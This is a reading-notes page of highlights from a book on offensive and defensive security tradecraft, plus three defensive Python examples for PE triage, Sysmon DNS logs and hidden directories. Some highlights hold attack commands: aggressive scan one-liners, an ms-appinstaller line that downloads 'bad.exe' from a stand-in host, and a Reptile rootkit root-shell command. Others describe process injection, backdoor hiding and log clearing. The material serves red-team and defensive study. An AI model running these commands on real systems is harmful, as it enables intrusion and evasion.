# Adversarial Tradecraft in Cybersecurity

## Metadata
- Author: [[Dan Borges]]
- Full Title: Adversarial Tradecraft in Cybersecurity
- Category: #books
## Highlights
- Download the example code files: You can download the example code files for this book from https://github.com/PacktPublishing/Adversarial-Tradecraft-in-Cybersecurity. ([Location 156](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=156))
- Tags: [[pink]]
- These examples of shifting strategies can also be seen on the offensive side, such as migration from the use of PowerShell scripting language as the dominant post-exploitation language to C# and other compiled languages that can still leverage .NET Framework on Windows. Another example is the shift from the criminal activity of cultivating and selling access to botnets to using ransomware on an entire network for a quick, high-gain profit. ([Location 224](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=224))
- Tags: [[pink]]
- Authentication defines how you prove your identity and authorization defines what you can access with that identity. ([Location 247](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=247))
- Tags: [[pink]]
- Cybersecurity is a deeply complex form of a non-cooperative, asymmetric game in which certain strategies can outperform other strategies. ([Location 275](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=275))
- Tags: [[pink]]
- Defense in depth involves layering security controls so that in the eventuality that a single control is breached, the offensive efforts can still be prevented, detected, and responded to by further layers of controls[8] ([Location 293](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=293))
- Tags: [[pink]]
- The cloud is just various virtually hosted and dynamically scaled Linux technologies. ([Location 315](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=315))
- Tags: [[pink]]
- What will unite the offense throughout this book is their use of guile and deception to gain the advantage. ([Location 368](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=368))
- Tags: [[pink]]
- One of the conference talks that best embodies the spirit of this book or the red teams I imagine in this book is Raphael Mudge's Dirty Red Team Tricks[17]. ([Location 372](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=372))
- Tags: [[pink]]
- Such gloves-off techniques may involve using honey pots to catch the attackers, reverse engineering the attacker's tools to find errors or vulnerabilities in them, and even hacking back the attacker's infrastructure to gain more intelligence on their operations. These gloves-off operations will be the majority of what we explore with this book. This means getting the advantage over your opponent, sometimes in an unfair way, and leveraging this advantage to win the game. ([Location 475](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=475))
- Tags: [[pink]]
- Barton Whaley, who studied the element of surprise and deception throughout his career, defined deception as "any information (conveyed by statement, action, or object) intended to manipulate the behavior of others by inducing them to accept a false or distorted perception of reality — their physical, social, or political environment"[22] ([Location 510](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=510))
- Tags: [[pink]]
- In Barton Whaley's Toward a General Theory of Deception, he covers two categories, showing the false and hiding the real. ([Location 523](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=523))
- Tags: [[pink]]
- compromising a user and obtaining root access on their machine. Often, the user will not be security savvy and the offense will have an advantage in this situation, masquerading as the user and gathering more information on the network. ([Location 555](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=555))
- Tags: [[pink]]
- As Mike Tyson aptly put it, "Everyone has a plan until they get punched in the mouth." ([Location 661](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=661))
- Tags: [[pink]]
- Encryption security is often thought of as a function of time in terms of the amount of time until a certain key can be brute-forced. ([Location 713](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=713))
- Tags: [[pink]]
- Sometimes, as a defender you may want to wait and watch the attacker, letting them take action before you contain or evict them to help understand their motives and targets. ([Location 721](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=721))
- Tags: [[pink]]
- These principles, such as deception, physical access, economy, humanity, planning, innovation, and timing, will all be crucial elements in gaining the advantage in a conflict. ([Location 764](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=764))
- Tags: [[pink]]
- As Eisenhower said, "The plan is useless, but planning is essential." ([Location 863](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=863))
- Tags: [[pink]]
- One of my favorite free resources for low-level technical skills is https://opensecuritytraining.info/, which includes over 23 high-quality courses, many with videos[7]. ([Location 966](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=966))
- Tags: [[pink]]
- have heard defense referred to as a series of web building, analogous to a spider building its web. Following this analogy, the net must be wide enough to cover all of the space they are tasked with protecting, but also flexible enough to alert them when the net has caught something. ([Location 1036](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1036))
- Tags: [[pink]]
- Security collectors or agents are typically used to generate data from active infrastructure. I've always bucketed digital security collection into three categories: network-based telemetry, host-based telemetry, and application-specific or log-based telemetry. ([Location 1054](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1054))
- Tags: [[pink]]
- There are tons of examples within the Awesome Honeypots GitHub repository (https://github.com/paralax/awesome-honeypots), ([Location 1171](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1171))
- Tags: [[pink]]
- An open-source alternative to Splunk is HELK[26], which is a free option providing similar functionality for those on a budget. HELK is a combination of many open-source logging technologies such as ELK, Elasticsearch, Logstash, and Kibana, ([Location 1198](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1198))
- Tags: [[pink]]
- ElastAlert can then send operators emails when they trigger on a known alert, and the alert triage flow can be handled in TheHive[34]. By using TheHive we can integrate our alerts into other standalone services we may have, including integration to Cortex, allowing us to take actions directly from alerts. Using TheHive, with Cortex enrichment from the rest of our infrastructure, will be a powerful ([Location 1241](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1241))
- Tags: [[pink]]
- An incredible example of the principle of innovation is the CCDC team representing the University of Virginia's (UVA) development of a tool called BLUESPAWN[45]. ([Location 1327](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1327))
- Tags: [[pink]]
- If you're looking at Cuckoo, you may consider the GitHub project BoomBox, which will spin up a full Cuckoo deployment in a few simple commands[50]. ([Location 1348](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1348))
- Tags: [[pink]]
- Services such as VirusTotal[52], Joe Sandbox[53], Anyrun[54], and HybridAnalysis[55] can give a massive boost in analysis capabilities against a particular piece of malware, but also come with the drawback of using a public service. ([Location 1352](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1352))
- Tags: [[pink]]
- Pure Funky Magic (PFM)[57]. PFM contains many common utilities that analysts would use but via a central location to access and share transformations. Similarly, Maltego or other mind-mapping services can be excellent for sharing intelligence or data about threats or targets among team members[58]. ([Location 1361](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1361))
- Tags: [[pink]]
- you want to play around with some of the technologies I've mentioned, I highly recommend checking out Security Onion 2[59]. This is an evolution of the very popular Security Onion, refactored with many of the tools we've already mentioned in this chapter. ([Location 1374](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1374))
- Tags: [[pink]]
- On the National CCDC red team, we use ephemeral Docker instances that will change IP addresses between every scan and send us consolidated scan reports. One really helpful thing is diff'ing scan results over time, to observe what changed in a network posture between two points in time. ([Location 1412](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1412))
- Tags: [[pink]]
- These vulnerability scanners, tools such as nmap-vulners[65], OpenVas[66], or Metasploit[67], allow attackers to find exploitable software from among that which they've already discovered. ([Location 1416](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1416))
- Tags: [[pink]]
- `alias turbonmap='nmap -sS -Pn --host-timeout=1m --max-rtt-timeout=600ms --initial-rtt-timeout=300ms --min-rtt-timeout=300ms --stats-every 10s --top-ports 500 --min-rate 1000 --max-retries 0 -n -T5 --min-hostgroup 255 -oA fast_scan_output -iL'` `$ turbonmap 192.168.0.1/24` The preceding Nmap scan is highly aggressive and loud on the network. ([Location 1435](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1435))
- Tags: [[pink]]
- ways to speed up large Nmap scans[76]. The purpose of this automation is to show how easy it is to chain simple tools together with a little bash scripting: `$ sudo masscan 192.168.0.1/24 -oG initial.gnmap -p 7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157 --rate 10000` `$ egrep '^Host: ' initial.gnmap | cut -d" " -f2 | sort | uniq > alive.hosts` `$ nmap -Pn -n -T4 --host-timeout=5m --max-retries 0 -sV -iL alive.hosts -oA nmap-version-scan` ([Location 1446](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1446))
- Tags: [[pink]]
- Garble will further help protect our payloads by removing build information, replacing package names, and stripping symbol tables; steps that help obfuscate by further hiding the real. ([Location 1481](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1481))
- Tags: [[pink]]
- To help planners navigate the various features of open-source C2 frameworks you may consider browsing The C2 Matrix, a collection of many modern public C2 frameworks[82] ([Location 1504](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1504))
- Tags: [[pink]]
- It's a popular strategy to make one of these implants an operational implant and the other a form of long-term persistence, which can spawn more operational implants in the event you lose an operational session. ([Location 1511](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1511))
- Tags: [[favorite]] [[pink]]
- good example of such a project for managing cracking infrastructure would be CrackLord[84]. ([Location 1519](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1519))
- Tags: [[pink]]
- This will be the first of several reaction correspondences we examine, focusing on process injection techniques, the forensic artifacts that in-memory techniques avoid, and some detection strategies for process injection. This chapter will show you why these strategies developed naturally as a result of this conflict over the last few decades. ([Location 1743](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1743))
- Tags: [[pink]]
- These tools have been around for so long and used in so many forensic response operations that even more tools have been innovated on top of them, to further facilitate traditional forensics. For example, log2timeline and Plaso were invented to help create a timeline of objects as they were written to disk[3]. ([Location 1782](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1782))
- Tags: [[pink]]
- Shellcode is a short name for position-independent assembly language code, ([Location 1824](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1824))
- Tags: [[pink]]
- As we already briefly touched on, there are many different techniques for allocating and running shellcode in a target process just on Windows alone. MITRE, for example, lists more than 11 different sub-techniques under process injection, everything from DLL injection and process doppelganging to process hollowing and thread execution hijacking[7]. ([Location 1827](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1827))
- Tags: [[pink]]
- Hexacorn, who runs a terrific security research blog, lists over 42 different process injection techniques on Windows alone[8]. ([Location 1834](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1834))
- Tags: [[pink]]
- CreateRemoteThread is probably one of the easiest, oldest, and most well-understood process injection techniques[10]. The technique itself requires several prerequisites, such as code already running in a high context, pre-generated position-independent shellcode to be executed, and a target process to execute it in. The technique also requires the SeDebug privilege[11], which is often inherited by the Administrator account. Another important requirement for the majority of implementations is that we must inject shellcode of the same architecture as the target process. For example, we need a 32-bit payload to inject into a 32-bit process, and a 64-bit payload to inject into a 64-bit process. Also, we can only inject into processes within the same context as our current process, so if we want to inject into a SYSTEM process, we need to privilege escalate to SYSTEM first. These limitations often make process injection a post-exploitation technique, meaning we need to be established on the host first. Regardless ([Location 1841](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1841))
- Tags: [[pink]]
- Frameworks like msfvenom add the ability to obfuscate shellcode through various encoding or compression schemes. We can even obfuscate our shellcode on top of basic encoding routines by encrypting our shellcode with a tool such as the Obfuscator[12]. ([Location 1896](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1896))
- Tags: [[pink]]
- If you want an example target to test your exploits on, which you should always do before using them in a competition, I recommend Metasploitable 3 as a vulnerable Windows Server 2008 image: https://github.com/rapid7/metasploitable3. It deploys easily enough with Vagrant on Virtual Box, although you will need to open up firewall ports so that you can access SMB and use the eternal blue exploit. ([Location 1939](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1939))
- Tags: [[pink]]
- This has since been replaced in Sliver with the Garble obfuscation framework[20], which will strip build info, filenames, replace package paths, obfuscate literals, and remove excess information[21]. ([Location 1979](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=1979))
- Tags: [[pink]]
- Granted, these tools may still be able to detect the injected processes based on their anomalous behavior, which is still very effective. For example, if the defenders had EDR agents such as Wazuh or OSQuery, they could potentially catch the suspicious process making network connections to the attacker's servers[24]. ([Location 2069](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2069))
- Tags: [[pink]]
- You can use PE-sieve to scan a single process or you can use Hasherezade's automated version, hollows_hunter, to quickly scan the whole system with PE-sieve's capabilities[36]. ([Location 2132](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2132))
- Tags: [[pink]]
- `> ./BLUESPAWN-client.exe --hunt -a Normal --hunts=T1055 --react=carve-memory,suspend --log=console,xml` ([Location 2144](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2144))
- Tags: [[pink]]
- Sysmon needs a policy to configure it; thankfully, SwiftOnSecurity provides an amazing base policy that is really well commented, so you can see how it is configured to alert[40]. For example, the SwiftOnSecurity policy excludes a bunch of known good services and processes, as well as excluding localhost network connections, alerting considerations that will reduce a lot of false positives. ([Location 2170](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2170))
- Tags: [[pink]]
- We can also use a Sysmon policy to catch specific API calls, events, and access that are commonly used in certain process injection techniques, such as with Olaf Hartong's include_process_suspend_resume rule[41]. We can load Olaf's full policy as well, which includes detections for a large number of techniques, all mapped to MITRE ATT&CK[42]. ([Location 2175](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2175))
- Tags: [[pink]]
- When we detect this process injection technique in memory, we can dump the associated byte array. If they are using .NET or managed code, we can decompile it, getting back source code that is more easily read than the assembly or machine code. Injected .NET assemblies specifically are simple to decompile directly from memory (you can use a tool such as dnSpy: https://reverseengineering.stackexchange.com/a/13784) once you locate the injected bytes. ([Location 2182](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2182))
- Tags: [[pink]]
- When we look at the assembly or byte code of a compiled program, this is often referred to as disassembly, but when we can reverse the program into a higher-level language that is interpreted at runtime, this is called decompiling. ([Location 2185](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2185))
- Tags: [[blue]]
- The Windows list is maintained at https://github.com/api0cradle/LOLBAS and is organized by file type, such as executable, script, or library. The Unix list is maintained at https://gtfobins.github.io/ and can be sorted via functionality, which makes it extremely useful for finding privilege escalation bugs. ([Location 2373](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2373))
- Tags: [[blue]]
- `start ms-appinstaller://?source=https://example.com/bad.exe && timeout 1 && taskkill /f /IM AppInstaller.exe > NUL` `> attrib -h -r -s /s /d %LOCALAPPDATA%\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\*` ([Location 2401](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2401))
- Tags: [[blue]]
- The sections of a PE are also well-known structures such as executable code (.text), info data (.data, .rdata, .bss), resources (.rsrc), exported functions (.edata), imported functions (.idata), and debug info (.debug). ([Location 2429](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2429))
- Tags: [[blue]]
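  The section layout described in this highlight is what an analyst walks when triaging a binary. The following is an added example (not code from the book or from any tool it mentions): it constructs a minimal PE image in memory, parses the COFF header and the 40-byte section headers as laid out in the PE/COFF specification, and flags sections mapped both writable and executable. The sample section names and the `.rwx` section are constructed for the demonstration.

  ```python
  """Walk the section table of a PE image and flag writable+executable sections.

  Added example (not code from the book): it constructs a tiny PE image in
  memory so the parser can be run offline, then reads the COFF header and the
  40-byte section headers exactly as laid out in the PE/COFF specification.
  """
  import struct

  # Section characteristic flags (PE/COFF specification values).
  IMAGE_SCN_CNT_CODE = 0x00000020
  IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
  IMAGE_SCN_MEM_EXECUTE = 0x20000000
  IMAGE_SCN_MEM_READ = 0x40000000
  IMAGE_SCN_MEM_WRITE = 0x80000000

  # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
  # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
  COFF_FMT = "<HHIIIHH"
  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
  # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
  # NumberOfLinenumbers, Characteristics (40 bytes).
  SECTION_FMT = "<8sIIIIIIHHI"


  def build_sample_pe(sections):
      """Construct a minimal PE image from (name, characteristics) pairs.

      Only the fields the parser reads are populated; the optional header is
      omitted (SizeOfOptionalHeader = 0), which is enough for section parsing.
      """
      dos = bytearray(64)
      dos[0:2] = b"MZ"
      struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE signature at offset 64
      coff = struct.pack(COFF_FMT, 0x8664, len(sections), 0, 0, 0, 0, 0)
      table = b"".join(
          struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"),
                      0x1000, 0x1000 * (i + 1),      # VirtualSize, VirtualAddress
                      0x200, 0x400 * (i + 1),        # SizeOfRawData, PointerToRawData
                      0, 0, 0, 0, flags)
          for i, (name, flags) in enumerate(sections)
      )
      return bytes(dos) + b"PE\0\0" + coff + table


  def parse_sections(data):
      """Return one dict per section header, in table order."""
      if data[:2] != b"MZ":
          raise ValueError("missing MZ signature")
      pe_off = struct.unpack_from("<I", data, 0x3C)[0]
      if data[pe_off:pe_off + 4] != b"PE\0\0":
          raise ValueError("missing PE signature")
      coff_off = pe_off + 4
      _, nsec, _, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff_off)
      # The section table starts right after the optional header.
      first = coff_off + struct.calcsize(COFF_FMT) + opt_size
      out = []
      for i in range(nsec):
          f = struct.unpack_from(SECTION_FMT, data, first + 40 * i)
          name, vsize, vaddr, rawsize, rawptr, flags = f[0], f[1], f[2], f[3], f[4], f[9]
          perms = (("r" if flags & IMAGE_SCN_MEM_READ else "-")
                   + ("w" if flags & IMAGE_SCN_MEM_WRITE else "-")
                   + ("x" if flags & IMAGE_SCN_MEM_EXECUTE else "-"))
          out.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                      "virtual_size": vsize, "virtual_address": vaddr,
                      "raw_size": rawsize, "raw_offset": rawptr,
                      "flags": flags, "perms": perms})
      return out


  def suspicious_sections(sections):
      """Names of sections that are both writable and executable; compilers
      rarely emit these, so they are a cheap triage signal for packed or
      self-modifying code."""
      return [s["name"] for s in sections if s["perms"][1:] == "wx"]


  # Constructed sample: three conventional sections plus one deliberately RWX.
  SAMPLE_PE = build_sample_pe([
      (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
      (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
      (".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
      (".rwx", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
  ])

  if __name__ == "__main__":
      for s in parse_sections(SAMPLE_PE):
          print(f"{s['name']:<8} {s['perms']} va=0x{s['virtual_address']:x} raw=0x{s['raw_offset']:x}")
      print("RWX sections:", suspicious_sections(parse_sections(SAMPLE_PE)))
  ```

  Pointing `parse_sections` at the bytes of a real executable works the same way, since the optional header is skipped by its declared size rather than assumed; the RWX heuristic is a triage prompt, not a verdict.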
- That said, this tool will be useful for us as we can now infect a known system binary and unless the defense looks closely enough, it will appear as a legitimate file. Fortunately for us, Sliver has implemented the binjection library into their post-exploitation framework. ([Location 2444](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2444))
- Tags: [[blue]]
- You will still need tools to parse DNS debug logs quickly, there are some older scripts and tools out there to help, such as the Reading-DNS-Debug-Logs.ps1 script from p0wershell.com[25]. ([Location 2624](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2624))
- Tags: [[blue]]
- individually. If you want a simple list of all of the domain names your client has queried, you can use the following one-liner: `` > Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational"; id=22} | ForEach-Object {$_.message -split "`r`n"} | Select-String QueryName | %{$_.line.split()[-1]} `` ([Location 2652](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2652))
- Tags: [[blue]]
- Get-SysmonLogs by 0DaySimpson[26]. This PowerShell module is very handy as it lets us manipulate the logs as PowerShell objects rather than splitting every line and searching. For example, we can query a limited set of logs and select specific information from the objects we get back, using this module: `> Get-SysmonLogs -DNS -Count 5 | ForEach-Object { $_.QueryName }` ([Location 2659](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2659))
- Tags: [[blue]]
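  The two highlights above both reduce to the same task: turning Sysmon event ID 22 message text into fields you can aggregate. The following is an added example (not code from the book, from the Get-SysmonLogs module, or from Sysmon itself). The four sample events are constructed to follow the `Key: value` line layout of Sysmon's DNS query message, which is what the PowerShell one-liner splits on; the long-label threshold used for flagging is an assumption.

  ```python
  """Parse Sysmon event ID 22 (DNS query) messages and summarise what was queried.

  Added example (not from the book or the Get-SysmonLogs module). The sample
  events are constructed to match the key/value layout Sysmon writes for its
  DnsQuery event; the flagging thresholds below are assumptions.
  """
  from collections import Counter


  def make_event(**fields):
      """Render a constructed event-22 message body with CRLF line endings."""
      order = ["RuleName", "UtcTime", "ProcessGuid", "ProcessId",
               "QueryName", "QueryStatus", "QueryResults", "Image"]
      lines = ["Dns query:"] + [f"{k}: {fields.get(k, '-')}" for k in order]
      return "\r\n".join(lines)


  # Constructed sample log: a browser resolving a name twice, a failed lookup
  # (status 9003 is DNS_ERROR_RCODE_NAME_ERROR), and a query with a very long
  # hex label of the kind that a DNS-tunneling review would want to see.
  SAMPLE_EVENTS = [
      make_event(UtcTime="2021-06-01 12:00:01.000", ProcessId=4242, QueryName="example.com",
                 QueryStatus=0, QueryResults="::ffff:93.184.216.34;",
                 Image=r"C:\Program Files\Mozilla Firefox\firefox.exe"),
      make_event(UtcTime="2021-06-01 12:00:02.000", ProcessId=4242, QueryName="example.com",
                 QueryStatus=0, QueryResults="::ffff:93.184.216.34;",
                 Image=r"C:\Program Files\Mozilla Firefox\firefox.exe"),
      make_event(UtcTime="2021-06-01 12:00:03.000", ProcessId=1337, QueryName="update.example.org",
                 QueryStatus=9003, QueryResults="",
                 Image=r"C:\Windows\System32\svchost.exe"),
      make_event(UtcTime="2021-06-01 12:00:04.000", ProcessId=5150,
                 QueryName="a9f3c2e1b7d4a9f3c2e1b7d4a9f3c2e1b7d4a9f3c2e1b7d4.tunnel.example.net",
                 QueryStatus=0, QueryResults="::ffff:10.0.0.5;",
                 Image=r"C:\Users\alice\AppData\Local\Temp\rundll32.exe"),
  ]


  def parse_event(message):
      """Turn one message into a dict; the first line ('Dns query:') is the title."""
      fields = {}
      for line in message.splitlines()[1:]:
          key, sep, value = line.partition(": ")
          if sep:
              fields[key] = value
      return fields


  def query_names(messages):
      """The plain list the one-liner produces: every QueryName, in order."""
      return [e["QueryName"] for e in map(parse_event, messages) if "QueryName" in e]


  def summarise(messages, max_label=40, max_name=100):
      """Aggregate by name and image, list failed lookups, and flag unusually
      long names or labels (thresholds are assumptions, tune per environment)."""
      events = [parse_event(m) for m in messages]
      by_name = Counter(e["QueryName"] for e in events)
      by_image = Counter(e["Image"] for e in events)
      failed = [e["QueryName"] for e in events if e.get("QueryStatus", "0") != "0"]
      flagged = [e for e in events
                 if len(e["QueryName"]) > max_name
                 or max(len(label) for label in e["QueryName"].split(".")) > max_label]
      return {"by_name": by_name, "by_image": by_image, "failed": failed, "flagged": flagged}


  if __name__ == "__main__":
      summary = summarise(SAMPLE_EVENTS)
      print("queries per name:", dict(summary["by_name"]))
      print("queries per image:", dict(summary["by_image"]))
      print("failed lookups:", summary["failed"])
      for e in summary["flagged"]:
          print("flagged:", e["ProcessId"], e["Image"], e["QueryName"])
  ```

  To run this against live data, feed it the `Message` property of each event returned by `Get-WinEvent` (exported to a text file, one message per record); the parser does not depend on CRLF versus LF line endings.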
- That said, Autoruns won't get everything on Windows. There is a lot of hidden and esoteric functionality on Windows that allows for execution persistence. Hexacorn continues to be a great source of computer security documentation, including a series of over 130 entries documenting different persistence mechanisms[32]. ([Location 2714](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2714))
- Tags: [[blue]]
- For competitions, I like using TrustedSec's Artillery, which is a Python server that listens on several common ports[41]. It works by waiting for a full TCP connection to these ports, then banning IP addresses via IPTables for things that make TCP connections to its ports. ([Location 2793](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2793))
- Tags: [[blue]]
- The problem with most honeypots is that they are too obviously vulnerable. If something has multiple exploitable services and several blatant misconfigurations, you tend to question why the organization hasn't found this vulnerable service yet. If the entire environment is full of vulnerabilities, it might make sense, but if the environment is highly locked down and there is one super vulnerable host, then it tends to look like a trap. ([Location 2798](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2798))
- Tags: [[blue]]
- Because the event log can be such a complex file format, we can learn from the fantastic project Eventlogedit by 3gstudent to understand several of these techniques from an offensive perspective[2] ([Location 2923](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2923))
- Tags: [[blue]]
- For our actual operations, we will use a more tested and ready-for-production-use version of the technique from QAX-A-Team, EventCleaner[5] ([Location 2941](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2941))
- Tags: [[blue]]
- Trying random techniques on the host where you are unsure if they will work is often referred to as flailing and is not something experienced hackers should engage in. ([Location 2965](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2965))
- Tags: [[blue]]
- Vlad Rico's apache2_BackdoorMod[7]. One drawback to using this tool and technique is that if the defender lists out the loaded modules, they can clearly see the names and module loaded, including our malicious module: `$ apache2ctl -t -D DUMP_MODULES` Therefore, as an attacker, you will probably want to rename your modules and backdoors to blend in with other existing modules. ([Location 2995](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=2995))
- Tags: [[blue]]
- On Windows, such driver-based rootkits require being signed for x64 systems; however, it's important to note that driver signing isn't enforced on x86 Windows systems, making them a much easier target for such activities. ([Location 3016](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3016))
- Tags: [[blue]]
- For our example, we will focus on Reptile, one of my favorite LKM rootkits[10]. ([Location 3017](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3017))
- Tags: [[blue]]
- is important to change the default configurations, as with a tool like Reptile there are many obvious locations to check and it will also reveal the tool in use very quickly. ([Location 3029](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3029))
- Tags: [[blue]]
- Reptile is epic because it can even hide its own kernel module by unlinking it from lsmod[15]. Unlike before with the Apache2 modules, this time if we list out the loaded kernel module, we will not see the Reptile module loaded. Reptile can also be used to escalate privileges, in the event we come back as an unprivileged user. To upgrade to a root shell, use the command tool with a root flag: `/reptile/reptile_cmd root`. When hiding processes, Reptile will hide the entire process tree, so the attacker can shell out from their existing backdoors now. ([Location 3041](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3041))
- Tags: [[blue]]
- classic tool for checking many known locations and for many known rootkits is rkhunter[20], however, by default, this will not detect the Reptile LKM rootkit for whatever reason. Luckily, we can use the Sandfly Security Go tool, processdecloak[21]. Simply running the tool will reveal processes hidden by Reptile. That said, a savvy operator would also notice several crucial files and directories missing once Reptile has been enabled, such as /etc/ and /var/ no longer being in the root directory. Additionally, if you notice a critical directory missing, but can still cd into that location, you probably have a rootkit on your hands. ([Location 3090](https://readwise.io/to_kindle?action=open&asin=B0957LV496&location=3090))
- Tags: [[blue]]
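  The "critical directory missing, but you can still cd into it" symptom above is a disagreement between two kernel interfaces: the directory listing (readdir) has been filtered, but a direct path lookup (stat) still succeeds. The following is an added example (not code from the book, rkhunter, or processdecloak) that compares the two views for a list of expected entries; the list of critical root directories is an assumption, and the self-check runs on a constructed temporary tree rather than a real root filesystem.

  ```python
  """Spot directory entries that readdir() hides but stat() still reaches.

  Added example (not code from the book, rkhunter or processdecloak). A
  rootkit that filters directory listings typically leaves the path itself
  resolvable, which is the "missing directory you can still cd into" symptom.
  """
  import os
  import tempfile

  # Top-level directories an operator would expect on a Linux host (assumed list).
  CRITICAL_ROOT_DIRS = ["bin", "etc", "usr", "var", "tmp", "proc"]


  def classify_entries(parent, expected):
      """Map each expected name to one of three states:
      'listed'  - present in the directory listing (normal),
      'hidden'  - absent from the listing but a direct stat() succeeds,
      'absent'  - genuinely not there.
      """
      listed = set(os.listdir(parent))
      states = {}
      for name in expected:
          if name in listed:
              states[name] = "listed"
          elif os.path.lexists(os.path.join(parent, name)):
              states[name] = "hidden"
          else:
              states[name] = "absent"
      return states


  def hidden_entries(parent, expected):
      """Names whose listing and lookup disagree; a non-empty result warrants a
      closer look with an offline tool, since the host's own view is suspect."""
      return sorted(n for n, st in classify_entries(parent, expected).items()
                    if st == "hidden")


  def self_check():
      """Exercise the logic on a constructed directory tree (no rootkit involved)."""
      with tempfile.TemporaryDirectory() as root:
          os.mkdir(os.path.join(root, "etc"))
          open(os.path.join(root, "passwd"), "w").close()
          return classify_entries(root, ["etc", "passwd", "var"])


  if __name__ == "__main__":
      print("self-check:", self_check())
      print("hidden under /:", hidden_entries("/", CRITICAL_ROOT_DIRS))
  ```

  The same listing-versus-lookup comparison underlies process decloaking against `/proc`, but a naive port of it needs one extra step: thread IDs are reachable as `/proc/<tid>` without appearing in the `/proc` listing, so a PID probe must exclude entries found under `/proc/<pid>/task/` before reporting anything as hidden.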
